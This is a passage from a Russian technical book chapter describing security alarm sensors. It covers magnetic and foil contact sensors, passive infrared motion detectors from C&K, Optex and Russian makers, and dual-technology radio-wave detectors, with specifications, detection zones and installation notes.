Ток, потребляемый в дежурном режиме, не более, мА.............................. 1
Чувствительность не менее, м/с2 ..................................................... 0, 25
Варианты применения и монтажа детектора приведены на рис. 3. 40.
3.1. Магнито- и электроконтактные датчики
Контактные датчики относятся к самым простым. Обычно они устанавливаются на двери и окна охраняемого помещения. Среди контактных датчиков широкое применение нашли электроконтактные датчики, представляющие собой ленту из тонкой алюминиевой фольги. Она клеится на стекло, двери, стены и т. п. При разрушении основания, на которое наклеена лента, она рвется и разрывает электрическую цепь. Для подключения к шлейфу охранной сигнализации лента зажимается в держателе (клемме), который приклеивается к тому же основанию, что и лента.
Широко распространены контактные датчики магнитного типа (магнитоконтактные датчики). Эти датчики выпускаются двух типов: для наружной и скрытой установки. Для повышения надежности охраны часто устанавливают по два и более датчиков, которые соединяют между собой последовательно. Магнитоконтактные датчики, предназначенные для скрытой установки, имеют цилиндрическую форму. Эти датчики, как и электроконтактные, подключаются к проводным шлейфам охранной сигнализации.
На российском рынке, кроме отечественных, широко представлены контактные датчики фирмы С&К Systems. Эти датчики можно быстро установить на окна или двери. Они выполнены на основе герконов, контакты которых размыкаются или замыкаются при приближении (удалении) постоянного магнита (рис. 3. 1). Геркон — это прибор, состоящий из герметично запаянных в стеклянную трубку
Рис. 3.1 Магнитоконтактный датчик с герконом
Рис. 3. 2. Датчики с различным рабочим зазором
контактов, которые замыкаются или размыкаются при приближении к нему постоянного магнита. В охранных системах магнит крепится к подвижной части двери или окна, а геркон — к неподвижной.
Фирма С&К Systems выпускает магнитоконтактные датчики двух типов: со стандартным рабочим зазором величиной 2 см (0, 75") и с расширенным рабочим зазором величиной 3 см (1, 25") (рис. 3. 2). Особенности датчиков фирмы С&К Systems:
> возможность увеличения рабочего зазора на 50%;
> низкая стоимость;
> высокая технологичность;
Рис. 3. 3. Модели датчиков со стандартным зазором
Рис.З.4. Модели датчиков с широким зазором
> простота установки;
> высокая помехоустойчивость.
Возможные варианты исполнения датчиков со стандартным зазором представлены на рис. 3. 3, а датчиков с широким зазором — на рис. 3. 4.
3.2. Пассивные инфракрасные детекторы движения
Для охраны внутренних помещений наибольшее распространение получили пассивные ИК детекторы движения. Они отличаются друг от друга, в основном, размером зоны обнаружения и помехоустойчивостью.
Принцип действия пассивных ИК детекторов основан на регистрации изменения интенсивности ИК излучения, возникающего при движении теплового объекта, например человека или собаки, в зоне обнаружения прибора. Чувствительным элементом такого прибора является пироэлемент (пироприемник), на поверхности которого под воздействием ИК излучения от любого теплового объекта возникает электрический заряд. Для регистрации факта движения теплового объекта в детекторе с помощью многосегментного зеркала формируется многолучевая диаграмма направленности, состоящая из множества лучей детекции, направленных под разными углами и в различных направлениях. Пересечение этих лучей тепловым объектом приводит к попаданию на пироэлемент импульсов ИК излучения и, как следствие, формирование последним электрических импульсов. Эти импульсы усиливаются и обрабатываются детектором, который подсчитывает их количество и временной интервал между ними. Значения этих параметров определяют
помехоустойчивость прибора и диапазон обнаруживаемых скоростей перемещающегося теплового объекта (от 3 м/с для быстро бегущего человека до 0, 3 м/с для очень медленного перемещения). Лучи детекции образуют зону обнаружения, которая определяет чувствительность прибора, т. е. максимальное расстояние, на котором еще происходит уверенное обнаружение перемещающегося объекта. Точные геометрические характеристики (конфигурация) зоны обнаружения обеспечиваются многосегментными зеркалами и оптической системой на линзах Френеля. Использование различных типов линз позволяет изменять конфигурацию зоны обнаружения в зависимости от обстановки. Благодаря этому детекторы движения имеют универсальное применение и используются для охраны объемов помещений, мест сосредоточения ценностей (музейных экспонатов, оргтехники и т. п.) и подходов к ним, коридоров, внутренних периметров, проходов между стеллажами, оконных и дверных проемов, полов и т. п. Оптическая система в зависимости от типа используемых линз позволяет получать зоны обнаружения следующих типов: объемную, поверхностную и узконаправленную.
Объемная зона (стандартная) формируется при использовании линз типа «широкий угол» и представляет собой сектор размером 90—110° с лучами детекции, образующими несколько дискретных зон обнаружения: дальнюю, промежуточную, ближнюю и нижнюю. Количество лучей детекции в этих зонах различное.
При использовании линз типа «горизонтальная занавеска» формируется поверхностная зона обнаружения. Такая зона имеет «мертвую» область (зона неуверенного обнаружения) до высоты 1 — 1, 2 м от уровня пола, что позволяет использовать детекторы с линзой типа «горизонтальная занавеска» в помещениях, где есть домашние животные.
Узконаправленная зона, формируемая линзой типа «вертикальная занавеска», позволяет использовать детекторы для охраны узких коридоров.
Для повышения обнаруживающей способности в некоторых детекторах используются датчики на основе двух или четырех пироэлементов. В данном случае луч детекции состоит из двух (четырех) элементарных лучей, а специальная схема включения чувствительных площадок пироприемника и способ обработки сигнала обеспечивают повышенную устойчивость прибора к засветкам, вызванным излучением осветительных приборов (ламп белого цвета) и солнца, воспринимаемым как помеха.
Детекторы хорошо защищены от воздействия электрических разрядов и электромагнитного излучения СВЧ диапазона, прочным металлическим корпусом, выполняющим роль экрана. Для визуального контроля работоспособности прибора и уровня помех в месте его установки используется светодиодная индикация. В некоторых типах детекторов имеется возможность дистанционного включения/выключения светодиодных индикаторов по шлейфу сигнализации.
При обнаружении движения, помех или при вскрытии прибора тревожное извещение может формироваться двумя способами: коротким замыканием (путем увеличения тока потребления) или разрывом (путем уменьшения тока потребления) шлейфа сигнализации. Выдача тревожного извещения производится путем замыкания/размыкания контактов выходных реле тревоги, вторжения и неисправности. Тревожное извещение выдается в течение нескольких секунд, т. к, детектор запоминает сигнал тревоги.
Иногда ИК детектор движения размещается в одном корпусе с детекторами других типов, например с детектором битого стекла. Это возможно благодаря использованию в детекторах движения метода пассивного инфракрасного обнаружения, не создающего помех и не оказывающего влияния на работу других приборов.
3.2.1. Детекторы движения серии XJ
Детектор движения XJ660T
Рис.3.5 Детектор движения XJ660T
Пассивный инфракрасный детектор XJ660T фирмы С&К Sysytem (IntelliSense) — это компактный, привлекательный и простой в монтаже прибор (рис. 3. 5). Он используется для охраны жилых и производственных помещений.
XJ660T — это пассивный инфракрасный детектор с зоной обнаружения размером 18х15 м. При изготовлении детектора используется запатентованная технология, практически исключающая возможный саботаж прибора.
Особенности детектора XJ660T:
> автоматический подсчет импульсов;
> регулировка чувствительности;
> комбинация многосегментного зеркала и линзы Френеля;
> регулировка характеристик зоны обнаружения в зависимости от высоты установки;
> температурная компенсация;
> устойчивость к белому свету;
> возможность использования линз различного типа.
Прибор комплектуется линзой типа «широкий
угол» (рис. 3. 6) или линзой типа «вертикальная
занавеска». Возможна установка линзы, обеспечивающей защиту от домашних животных, она исключает срабатывание прибора при движении объекта высотой менее 1 м.
Основные технические характеристики прибора XJ660T
Пассивный инфракрасный датчик................................ двойной пироэлемент
с регулируемой чувствительностью Размер зоны обнаружения, м......................................................... 18х15
Рис. 3. 6. Зоны обнаружения детектора XJ660T
Потребляемый ток (при напряжении питания+ 12 В), мА...................... 20
Диапазон рабочих напряжений, В.................................................. 6—14
Выходные реле:
реле тревоги, мА/ В.............................................................. 100/30
реле вмешательства, мА/ В...................................................... 25 / 30
Устойчивость к радиопомехам на расстоянии 3 м
в диапазоне 27-1000 МГц, Вт.......................................................... 100
Устойчивость к белому свету на расстоянии 2, 4 м не менее, кд........ 20000
Диапазон рабочих температур, °С...................................... от -18 до+ 65
Габаритные размеры,мм........................................................ 130х70х60
Масса, г.......................................................................................... 227
Для увеличения зоны обнаружения детектора используется дополнительный поворотный кронштейн типа DT4SW. Благодаря прекрасному дизайну, прибор хорошо вписывается в интерьер квартиры или офиса. Детектор сертифицирован МВД России.
Детектор движения XJ413T
Надежное обнаружение, регулируемая чувствительность, компактный современный дизайн — все эти характеристики присущи пассивному инфракрасному детектору движения XJ413T фирмы С&К Systems (рис. 3. 7). Детектор предназначен для использования внутри жилых помещений и офисов. Он легко устанавливается на стене или в углу помещения (см. раздел 1. 4).
Рис.3.7.Детектор движения XJ413T
Особенности детектора XJ413T:
> размер зоны обнаружения 13х13 м;
> регулируемый счетчик импульсов;
> контроль нижней зоны;
> удобство монтажа;
> дополнительные линзы;
> малые габариты;
> датчик вмешательства;
> устойчив к белому свету;
> устойчив к радиопомехам.
Размер зоны обнаружения детектора определяется линзой «широкий угол» (рис. 3. 8) и составляет 13х13 м. Контроль нижней зоны осуществляется за счет большей плотности лучей, направленных вниз. Двойной пассивный инфракрасный элемент с дополнительной линзой типа "горизонтальная занавеска"
позволяет избежать ложных срабатывании прибора в помещениях с домашними животными. Путем изменения числа счетных импульсов детектор можно отрегулировать в соответствии с особенностями окружающей обстановки. В корпусе прибора находится датчик вмешательства (реле с нормально разомкнутыми контактами), формирующий сигнал тревоги при вскрытии корпуса детектора.
Основные технические характеристики прибора XJ413T:
Размер зоны обнаружения, м......................................................... 13х13
Напряжение питания, В.............................................................. 10—14
Потребляемый ток (при напряжении питания+ 12 В), мА...................... 20
Выходные реле:
реле вмешательства, мА/В...................................................... 25/24
реле тревоги, мА/В.............................................................. 100/24
Устойчивость к белому свету на расстоянии 3 м не менее, кд............ 20000
Устойчивость к радиопомехам в диапазоне частот
10-1000 МГц, В/м........................................................................... 30
Диапазон рабочих температур, С.......................................... от 0 до+ 49
Габаритные размеры, мм.......................................................... 73х57х40
Масса, г............................................................................................ 71
Чувствительность прибора, нормальная или высокая, устанавливается перемычкой на плате. Зона обнаружения состоит из двойных лучей и имеет дальнюю (22 луча), промежуточную (7 лучей) и ближнюю (4 луча), а также нижнюю зоны (2 луча). Монтаж прибора осуществляется на стене или в углу помещения, возможна установка его на универсальном монтажном шарнире SMB-10.
Рис. 3. 8. Зоны обнаружения детектора XJ413T
Детектор движения XJ-450T
Рис. 3.9. Пассивный ИК детектор движения XJ450T
Пассивный инфракрасный детектор XJ450T фирмы С&К Systems выполнен в прочном пластиковом корпусе белого цвета (рис. 3. 9). Он обеспечивает надежное обнаружение движущихся объектов, излучающих тепло. Регулировка чувствительности и дальности действия позволяют быстро настраивать датчик под конкретные условия применения. Прибор предназначен для использования в жилых помещениях, офисах и на небольших предприятиях.
Особенности детектора XJ450T:
> регулируемая дальность обнаружения;
> контроль нижней зоны;
> регулируемая чувствительность;
> защита от насекомых;
> дополнительные линзы;
> светодиодная индикация срабатывания
прибора.
Двойной пассивный инфракрасный элемент с дополнительной линзой типа «горизонтальная занавеска» (рис. 3. 10) позволяет избавиться от ложных срабатываний детектора при перемещении в охраняемой зоне домашних животных. С помощью специального алгоритма обработки сигналов исключаются потенциальные источники ложных
Рис. 3. 10. Зоны обнаружения прибора XJ450T
тревог, такие, например, как насекомые. Нижняя зона контролируется благодаря плотной многолучевой структуре диаграммы направленности. Возможность регулировки положения датчика детектора по вертикали позволяет корректировать размер зоны обнаружения прибора, что делает более гибким его применение. В зависимости от регулировки размер зоны обнаружения может быть 15х12 м или 10х12 м. Чувствительность детектора устанавливается перемычкой и имеет два уровня: нормальная и высокая.
Основные технические характеристики прибора XJ450T:
Размер зоны обнаружения, м......................................... 15х12 или 10х12
Напряжение питания, В.............................................................. 10— 14
Потребляемый ток (при напряжении питания+ 12 В), мА...................... 20
Выходные реле:
реле вмешательства, мА/ В...................................................... 25 / 24
реле тревоги, мА/ В.............................................................. 100 / 24
Устойчивость к белому свету на расстоянии 2, 4 м не более, кд.......... 20000
Устойчивость к радиопомехам в диапазоне частот
10-1000 МГц, В/м...........................................................................30
Диапазон рабочих температур, С.......................................... от 0 до+ 49
Габаритные размеры, мм.......................................................... 90х64х41
Масса, г............................................................................................ 85
Детектор легко устанавливается на стене или в углу помещения. Зона обнаружения состоит из двойных лучей и имеет дальнюю (22 луча), промежуточную (6 лучей), ближнюю (3 луча), а также нижнюю (2 луча) зоны.
Путем изменения числа подсчитываемых импульсов можно отрегулировать чувствительность детектора в соответствии с особенностями окружающей обстановки. Для установки и настройки прибора можно применять монтажный шарнир SMB-10.
Детектор имеет сертификат качества для использования в России.
Детекторы движения МС-550/МС-550Т
Пассивные ИК детекторы МС-550/МС-550Т фирмы С&К (IntelliSense) предназначены для использования в закрытых помещениях. Это приборы высокой степени надежности, достигнутой за счет использования микропроцессора. Детекторы имеют режим самодиагностики, а также оборудованы индикатором режимов работы. Внешний вид приборов приведен на рис. 3. 9. Он такой же, как у детектора XJ405T.
Особенности детекторов МС-550/МС-550Т:
> использование двойного пироэлемента;
> плотная диаграмма направленности;
> микропроцессорная система обработки сигналов;
> автоматическая температурная компенсация;
> самодиагностика;
> регулировка чувствительности;
> защита от проникновения насекомых;
> режим проверки конфигурации охраняемой зоны.
Двойной пироэлемент и оптическая система позволяют получить зону обнаружения размером 15х12 м (рис. 3. 10) удвоенной плотностью лучей детекции. Детектор обладает устойчивостью к ложным срабатываниям при наличии в помещении любого количества кошек или других мелких животных такого же размера с общим весом не более 7 кг, а также любого количества произвольно летающих или находящихся в клетках птиц. Мыши и крысы тоже не влияют на работу детектора.
Автоматическая проверка работоспособности детектора производится ежечасно. При обнаружении неисправности тестирование повторяется через каждые 5 минут. Ошибки при выполнении теста индицируются мигающим светодиодом. В случае успешного завершения самотестирования, проводимого автоматически после подачи питания, или при запуске режима самодиагностики пользователем детектор переходит в 10-минутный режим проверки конфигурации охраняемой зоны. В этом режиме можно определить точную конфигурацию охраняемой зоны, выполнив тест-проход, — каждый раз при пересечении края одного из лучей детекции будет включаться светодиод.
Основные технические характеристики приборов МС-550/МС-550Т:
Размер зоны обнаружения, м......................................................... 15х12
Напряжение питания, В.............................................................. 10—14
Потребляемый ток (при напряжении питания+ 12 В), мА...................... 20
Выходные реле:
реле вмешательства, мА/В...................................................... 25/24
- реле тревоги, мА/В.............................................................. 100/24
Устойчивость к белому свету, лк..................................................... 6500
Устойчивость к радиопомехам в диапазоне
частот 10-1000 МГц, В/м................................................................. 30
Диапазон рабочих температур, С.......................................... от 0 до+ 40
Габаритные размеры, мм.......................................................... 90х44х45
Масса, г............................................................................................ 85
Детектор позволяет регулировать чувствительность с помощью перемычек на монтажной плате прибора. Возможны три уровня чувствительности: высокая, нормальная и низкая.
Детектор может устанавливаться на стене или в углу помещения на высоте 1, 2, 2, 3 или 3 м от пола. При этом следует помнить, что охраняемая зона должна находиться в пределах прямой видимости детектора.
3.2.2. Детектор движения PIR700E
Пассивный инфракрасный детектор PIR700E предназначен для установки в помещениях площадью до 200 м2. Устанавливается он на стену или в углу помещения. Работа детектора основана на использовании двойного пироэлемента. Конструктивные особенности детектора позволяют применять его в жилых помещениях, где есть домашние животные. Особенности детектора PIR700E:
> эффективная защита от ложных срабатываний, вызванных радиопомехами;
> регулировка размеров зоны обнаружения в вертикальной и горизонтальных плоскостях;
> двойной пироэлемент;
> защита от вскрытия;
> высокая чувствительность;
> небольшие габариты;
> фильтрация питающего напряжения от сетевых помех;
> возможность установки в углу помещения.
Для работы детектора рекомендуется использовать источник бесперебойного питания. При использовании линзы «широкий угол» (рис. 3. 11) и установке на высоте 1, 8 м детектор позволяет контролировать территорию размером 15х15 м. Применение дополнительных линз позволяет скорректировать диаграмму направленности датчика (рис. 3. 11). Использование линзы Lens 817 типа «горизонтальная занавеска» имеет смысл лишь в том случае, когда детектор устанавливается в помещении, где есть домашние животные. Использование линзы Lens 818 типа «вертикальная занавеска» оправдано, когда прибор устанавливается в узком коридоре.
Рис. 3. 11. Зоны обнаружения прибора PIR700E
Основные технические характеристики детектора PIR700E:
Размеры зоны обнаружения, м.................................................. 15, 2х15, 2
Напряжение питания, В............................................................ 10, 6—16
Потребляемый ток (при напряжении питания+ 12 В), мА...................... 23
Максимальная высота установки, м.................................................... 3, 6
Реле тревоги, мА/В.................................................................. 100/24
Выход детектора.............................. нормально замкнутые контакты реле
Время включения реле не более, с........................................................ 3
Диапазон рабочих температур, С...................................... от -10 до+ 50
Габаритные размеры, мм......................................................... 114х64х43
Масса, г.......................................................................................... 198
Установка детектора производится на стену или в угол помещения, максимальная высота установки — 3, 6 м. Датчик переходит в режим охраны не ранее чем через 3 минуты после подачи питания. Данный режим индицируется загоранием светодиодного индикатора прибора. Для отключения светодиода необходимо удалить перемычку на плате прибора. При монтаже детектора не рекомендуется располагать его вблизи источников тепла, таких как радиаторы отоллйния, обогревателя, лампы накаливания и т.п..
3. 2. 3. Наружный детектор движения LX-2AU
Пассивный инфракрасный детектор LX-2AU компании Optex — это прибор, специально разработанный для наружного использования. Детектор обеспечивает стабильность размеров зоны обнаружения в самых жестких климатических условиях, таких как снег, дождь, туман и т. п.
Особенности детектора LX-2AU:
> автоматическая стабилизация размеров зоны обнаружения в любых усло виях окружающей среды;
> двойной пироэлемент датчик высокой чувствительности;
> сбалансированная температурная компенсация;
> три уровня чувствительности;
> регулировка чувствительности;
> встроенный светодиодный индикатор режима работы;
> возможность регулировки положения датчика в вертикальной и горизон тальной плоскости;
> оперативное изменение размеров зоны обнаружения.
Датчик устойчив к воздействию прямых солнечных лучей и света автомобильных фар. Специальный алгоритм обработки сигнала позволяет ему адаптироваться к изменяющимся условиям окружающей среды. Основные технические характеристики прибора LX-2AU:
Размер зоны обнаружения, м......................................................... 12х14
Угол обзора, град............................................................................ 120
Регистрируемая скорость перемещения, м/с......................... от 0, 3 до 1, 0
Регулировка:
в вертикальной плоскости, град.................................................... ±45
в горизонтальной плоскости, град.............................................. 0 — 20
Выходное реле, мА/В............................................................... 100/24
Количество уровней чувствительности.................................................. 3
Диапазон рабочих температур, °С...................................... от -20 до+ 50
Встроенный фотодиод позволяет осуществлять автоматическое отключение датчика при определенном уровне освещенности, как правило в светлое время суток. Уровень освещенности, при котором происходит это отключение, регулируется.
Датчик удобен в эксплуатации и при установке. Потолочные и настенные кронштейны позволяют регулировать положение датчика в вертикальной и горизонтальной плоскости.
3. 2. 4. Детекторы движения «Фотон»
Пассивные инфракрасные детекторы «Фотон-6» и «Фотон-8»
Охранные пассивные инфракрасные детекторы «Фотон-6» и "Фотон-8" разработаны и производятся в России. Они предназначены для работы в составе пультов контроля, таких как « Сигнал- 37А», «Сигнал-40», «Сигнал-45 », а так же в системах «Фобос», «Нева-10М», «Комета-К».
Питание приборов осуществляется по шлейфу сигнализации. В качестве датчика используется двойной пироэлемент. Благодаря применению трех типов
линз детекторы имеют три зоны обнаружения. Корпус приборов имеет современный дизайн (рис. 3. 12), что позволяет им хорошо вписываться в интерьер любого помещения.
Особенности детекторов типа «Фотон»:
> высокая обнаруживающая способность;
> высокая устойчивость к электромагнитным, тепловым и световым помехам;
> два способа формирования тревожного извещения;
> быстрый выход на рабочий режим;
> визуальный контроль работоспособности прибора;
> контроль напряжения питания;
> питание по шлейфу сигнализации;
> широкие возможности при установке.
Высокая обнаруживающая способность детекторов обеспечивается благодаря использованию трех зон обнаружения: объемной, поверхностной и линейной (рис. 3: 13). Это позволяет использовать их для охраны помещений практически любой конфигурации.
Рис. 3. 13. Зоны обнаружения детектора «Фотон-6»
Основные технические характеристики детекторов «Фотон»:
Контролируемая площадь с объемной зоной обнаружения, м2............... 120
Регистрируемая скорость перемещения, м/с............................... 0, 3—3, 0
Потребляемый ток:
«Фотон-6», мА............................................................................. 15
« Фотон-8», мА.............................................................................. 1
Диапазон рабочих температур:
«Фотон-6», °С............................................................. от -30 до+ 50
"Фотон-8", °С............................................................. от -10 до+ 50
Габаритные размеры, мм....................................................... 107х107х64
Масса, кг....................................................................................... 0, 25
Детектор движения «Фотон-СК»
Охранный объемный оптико-электронный детектор движения «Фотон-СК» (рис. 3. 14) производится в России. Он разработан совместно с американской фирмой С&К Systems по заказу Главного управления вневедомственной охраны МВД России. Датчик рекомендуется использовать для установки в жилых помещениях, офисах и на небольших предприятиях.
Особенности детектора «Фотон-СК»:
> отключение светодиодного индикатора в режиме охраны;
> защита от несанкционированного вскрытия;
> высокая помехоустойчивость;
> защита от домашних животных;
> минимальное количество комплектующих элементов;
> возможность установки на стене или в углу помещения.
В настоящее время прибор «Фотон-СК» является одним из самых дешевых детекторов движения на российском рынке. При производстве прибора используется современное технологическое оборудование для поверхностного монтажа фирмы Universal Instruments Corporation, что дает возможность получить очень высокие характеристики прибора.
Детектор имеет пять зон обнаружения и перекрывает территорию размером 15х12 м
(рис. 3.15). Цифровая обработка сигнала позволяет исключить срабатывание датчика от пролетающих насекомых. Дополнительная линза позволяет ограничить зону обнаружения снизу до определенной высоты, обеспечивая тем самым защиту от домашних животных.
Рис. 3. 15. Зоны обнаружения прибора «Фотон-СК»
Основные технические характеристики прибора «Фотон-СК»:
Размер зоны обнаружения, м......................................................... 15х12
Напряжение питания, В.............................................................. 10—14
Потребляемый ток, мА....................................................................... 20
Диапазон рабочих температур, °С...................................... от -18 до+ 49
Габаритные размеры, мм.......................................................... 90х64х41
Масса, г............................................................................................ 85
"Фотон-СК" — это один из лучших детекторов, выпускаемых отечественной промышленностью. Он обладает наивысшим показателем качество/цена.
3. 2. 5. Детектор движения МРС 4040Т
Пассивный инфракрасный детектор МРС 4040Т с двойным чувствительным датчиком производства компании IntelliSense — это экономичный прибор с размером зоны обнаружения 12х15 м (рис. 3. 16). В нем используется запатентованная технология С&К, а также комбинация сегментного зеркала и линзы Френеля, что практически исключает возможный саботаж прибора.
Особенности детектора МРС 4040Т:
> температурная компенсация;
> регулировка чувствительности;
> регулировка зоны обнаружения в зависимости от высоты установки;
> устойчивость к белому свету;
> дополнительный поворотный кронштейн.
Рис. 3. 17. Зоны обнаружения прибора МРС4040Т
В приборе используется двойной пироэлемент с регулируемой чувствительностью. При использовании линзы «широкий угол» (рис. 3. 17) площадь, контролируемая прибором, составит 144 м2 (12х12 м). Возможна установка линзы «вертикальная занавеска», которая обеспечивает узкую охраняемую зону длиной до 18 м. Линза «горизонтальная занавеска» для защиты от домашних животных исключает срабатывание детектора при возникновении движения в зоне, высота которой ниже 1, 2 м. Это обеспечивается как при использовании широкой, так и узкой диаграммы направленности.
Основные технические характеристики прибора МРС4040Т:
Размер зоны обнаружения, м......................................................... 12х 12
Устойчивость к радиопомехам на расстоянии 3 м
в диапазоне 20-100 МГц, Вт........................................................... 100
Устойчивость к белому свету на расстоянии 2, 4 м не менее, кд......... 20000
Напряжение питания, В................................................................ 8—14
Потребляемый ток (при напряжении питания+ 12 В), мА...................... 20
Выходные реле:
реле тревоги, мА, В.............................................................. 100/30
реле вмешательства, мА/ В...................................................... 25 /30
Диапазон рабочих температур, С...................................... от -18 до+ 65
Габаритные размеры, мм.......................................................... 92х60х50
Масса, г............................................................................................ 71
Датчик устанавливается на стену или в углу помещения. Для установки может использоваться дополнительный поворотный кронштейн типа DT4SW. Детектор предназначен для охраны закрытых помещений. Высокое качество и умеренная цена прибора — это как раз то, что делает его конкурентно способным на отечественном рынке технических средств охраны.
3.2.6. Детекторы серии IQ200
Пассивные инфракрасные детекторы движения серии IQ200 компании IntelliSense используют комбинацию четырех пироэлементов с регулируемой чувствительностью. Приборы (рис. 3.18) предназначены для организации охраны и установки в жилых помещениях, офисах и на небольших предприятиях. Детектор IQ220T имеет радиус действия 12 м, а детектор IQ260T —18м. Особенности детекторов серии 10200:
> возможность регулировки размеров зоны обнаружения;
> светодиодная индикация режима работы;
> устойчивость к радиопомехам;
> устойчивость к белому свету;
> температурная компенсация.
В модели IQ220T реализована запатентованная технология С&К, благодаря которой практически полностью исключены ложные срабатывания системы. Многосегментное зеркало и линза Френеля обеспечивают зону обнаружения площадью около 200 м2. С помощью набора линз можно получить необходимую диаграмму направленности детектора (рис. 3.19). Прибор может оснащаться линзой «горизонтальная занавеска» для защиты от ложной тревоги, вызванной домашними животными. Детектор содержит два двойных пироэлемента с регулируемой чувствительностью.
Основные технические характеристики приборов серии IQ200:
Размер зоны обнаружения:
IQ220T,M................................................................................ 12х12
IQ260T, м................................................................................ 18х15
Устойчивость к радиопомехам на расстоянии 3 м
в диапазоне 27-1000 МГц, Вт .......................................................... 100
Устойчивость к белому свету на расстоянии 2,4 м, кд....................... 20000
Напряжение питания, В.............................................................. 10—14
Потребляемый ток (при напряжении питания +12 В), мА ......................30
Выходные реле:
реле тревоги, мА/В .............................................................. 100/30
реле вмешательства, мА/ В ...................................................... 25/30
Диапазон рабочих температур, °С ...................................... от -18 до +65
Габаритные размеры, мм ........................................................ 130х70х60
Масса, г .......................................................................................... 227
Рис. 3. 19. Зоны обнаружения детектора IQ200T
Детекторы серии IQ200 устанавливаются на стену или в угол помещения. Возможно применение дополнительного поворотного кронштейна для лучшего перекрытия охраняемой зоны. Современный дизайн прибора хорошо вписывается в любой интерьер квартиры или офиса.
3. 2. 7. Потолочный детектор FIR5030
Детектор движения FIR5030 компании С&К (IntelliSense) — это два самостоятельных прибора в одном корпусе: пассивный инфракрасный детектор и детектор битого стекла. FIR5030 имеет круговую диаграмму направленности и предназначен для установки на потолке охраняемого помещения. Он имеет современный дизайн (рис. 3. 20) и высокие эксплуатационные характеристики, что делает его прекрасным средством для охраны помещений, например небольших магазинов со стеклянным фасадом или офисов. Особенности детектора FIR5030:
> возможность монтажа заподлицо с поверхностью потолка и на подвесном потолке;
> два выходных реле в одном корпусе (для каждого детектора свое);
> регулируемая высота монтажа;
> регулировка чувствительности;
> светодиодный индикатор режима работы;
> запоминание сигнала тревоги.
В состав прибора входит пассивный инфракрасный (ПИК) детектор с круговой диаграммой направленности на основе пироэлемента с регулируемой чувствительностью. Он предназначен для обнаружения несанкционированного входа в помещение. В нем может быть использовано одно из двух взаимозаменяемых зеркал, применение которых определяется высотой установки прибора и необходимым количеством лучей детекции (рис. 3. 21).
При установке зеркала. № 1 высота монтажа должна составлять от 2, 5 до 3, 5 м от пола. При этом диаграмма направленности будет состоять из 77 лучей детекции различной длины.
При установке зеркала №2 высота установки должна быть 3, 5—4, 9 м. Число лучей детекции при этом уменьшается до 61.
Второй детектор прибора — это детектор битого стекла (ДБС)Flex Guard
с радиусом действия до 9 м, предназначенный для регистрации факта разбивания стекла и формирования сигнала тревоги. Принцип действия детектора основан
на анализе спектра звукового сигнала, возникающего при ударе о стекло
и при его разбивании. Для формирования сигнала тревоги прибор должен
зарегистрировать удар о стекло и звон разбиваемого стекла, причем интервал
между обоими звуками должен быть не более 150 мс. Это исключает возможность ложного срабатывания. Радиус действия детектора битого стекла зависит от сорта, толщины и размера стекла. Поэтому для настройки прибора необходимо использовать специальный имитатор разбивания стекла FlexGuard 700..
Технические характеристики детектора FIR5030:
Радиус зоны обнаружения ПИК детектора, м.......................................15
Число лучей детекции не менее ..........................................................61
Высота установки, м ........................................................... от 2,5 до 4,9
Радиус обнаружения ДБС не более, м .................................................. 9
Сорт стекла ................................................ металлизированное, слоистое
закаленное, усиленное Толщина стекла, мм ....................................................................... 4 — 7
Размер стекла не менее, мм ....................................................... 270х270
Напряжение питания, В ............................................................ 8,5—1,6
Потребляемый ток (при напряжении питания +12 В), мА ......................40
Выходные реле:
реле тревоги ПИК детектора, мА/В ....................................... 500/30
реле тревоги ДБС, мА/В ....................................................... 500/30
реле вмешательства, мА/ В...................................................... 25 /30
Рис. 3. 21. Зоны обнаружения детектора FIR5030
Прибор может быть установлен на поверхности потолка или заподлицо с ней. Высота монтажа регулируется с помощью дополнительного зеркала. В приборе предусмотрена возможность регулировки чувствительности ПИК детектора и ДБС и запоминание сигнала тревоги.
3.2.8. Детекторы движения фирмы Arrowhead
Пассивные инфракрасные детекторы движения фирмы Arrowhead в России широко представлены изделиями серии 300 и 1000. Все они имеют современный дизайн и высокие технические характеристики. Внешний вид детекторов движения и их характеристики приведены в табл. 3.1.
3. 3. Радиоволновые и комбинированные детекторы движения
Радиоволновые детекторы движения предназначены для обнаружения и регистрации движения в охраняемой зоне. Каждый детектор содержит СВЧ-модуль, в состав которого входят излучатель и приемник высокочастотных колебаний. В отличие от пассивных ИК детекторов, подробно рассмотренных выше, радиоволновые детекторы являются активными устройствами, так как излучают в пространство СВЧ колебания. Принцип действия этих приборов основывается на интерференции радиоволн сантиметрового диапазона или эффекте Доплера (изменение частоты принимаемого сигнала, отраженного от движущегося объекта).
При охране внутренних помещений по характеристикам радиоволновые детекторы аналогичны описанным выше пассивным ИК детекторам. Однако в отличие от них, они имеют более низкую помехозащищенность и достаточно высокий уровень СВЧ излучений. Поэтому в последнее время все чаще стали применяться приборы, в состав которых входят два детектора — пассивный ИК и радиоволновый. Это так называемые детекторы двойной технологии. В таких приборах пассивный И К детектор работает непрерывно. При регистрации им факта движения теплового объекта в зоне обнаружения включается радиоволновый детектор. Если последний подтвердит наличие подвижного объекта в зоне охраны, прибор сформирует и выдаст по шлейфу сигнализации тревожное извещение путем замыкания или размыкания контактов выходных реле. Такой режим работы детекторов позволяет обеспечить высокий уровень помехозащищенности прибора и уменьшить уровень СВЧ излучений, поскольку радиоволновый детектор включается только на короткое время.
Радиоволновые детекторы могут работать на одной из нескольких рабочих частот (литер), устанавливаемых с помощью переключателей на плате СВЧ-модуля прибора. Это позволяет использовать несколько однотипных детекторов, работающих на различных частотных литерах, в одном помещении одновременно
Таблица 3. 1. Пассивные ИК детекторы фирмы Arrowhead
3.3.1. Детекторы движения фирмы Dual Tec
Детекторы движения фирмы Dual Tec, комбинирующие пассивную инфракрасную и радиоволновую технологии, обеспечивают одновременно необходимую чувствительность и стабильность работы, а также практически полностью исключают ложные срабатывания. Детекторы движения серии DT5000 (рис. 3. 22) предназначены для установки на потолке и имеют зону обнаружения радиусом до 15 м.
Особенности детекторов серии DT5000:
> ПИК и радиоволновый детекторы в одном корпусе;
> круговая диаграмма направленности;
> высокая защищенное, от радиопомех;
> низкий уровень ложных срабатываний
> простота установки.
Приборы этой серии, например детектор DT5360 компании С&К с зоной обнаружения радиусом 15 м, устанавливается на потолке и является альтернативным вариантом детекторам, устанавливаемым на стенах.
